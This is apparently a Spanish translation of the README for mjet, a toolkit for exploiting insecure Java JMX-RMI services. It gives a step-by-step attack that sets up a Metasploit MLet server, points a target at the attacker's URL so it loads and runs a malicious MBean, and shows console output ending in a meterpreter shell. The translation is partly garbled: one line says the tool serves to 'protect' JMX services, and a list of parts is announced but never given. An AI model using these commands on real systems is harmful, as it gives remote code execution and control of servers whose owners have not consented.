
Kit de explotación de Mogwai Java Management Extensions (JMX)
Mogwai Security Java Management Extensions (JMX) Exploitation Toolkit
mjet es una herramienta que puede utilizarse para proteger servicios JMX configurados de forma insegura. Se basa en el artículo "Exploiting JMX-RMI" de Braden Thomas/Accuvant "http://www.accuvant.com/blog/exploiting-jmx-rmi" y puede usarse para ejecutar payloads arbitrarios de Metasploit en el sistema objetivo.
Mjet fue originalmente planeado para ser un toolkit de ataque completo; sin embargo, notamos que el repositorio de Metasploit en Github contiene un pull request que proporcionará soporte básico para RMI/serialización de Java en ruby nativo. Esto es genial y elimina la dependencia de Java. Así que dejamos de desarrollar esta herramienta y crearemos módulos de Metasploit en el futuro cercano.
mjet consta de las siguientes partes:
El ejemplo usa los siguientes sistemas: atacante: 192.168.178.1 objetivo: 192.168.178.200, servicio JMX ejecutándose en el puerto tcp 1616
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
Use mjet.jar para conectarse al servicio JMX vulnerable y proporcione la URL al servidor web MLet...
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
y disfruta de tu shell de meterpreter :-)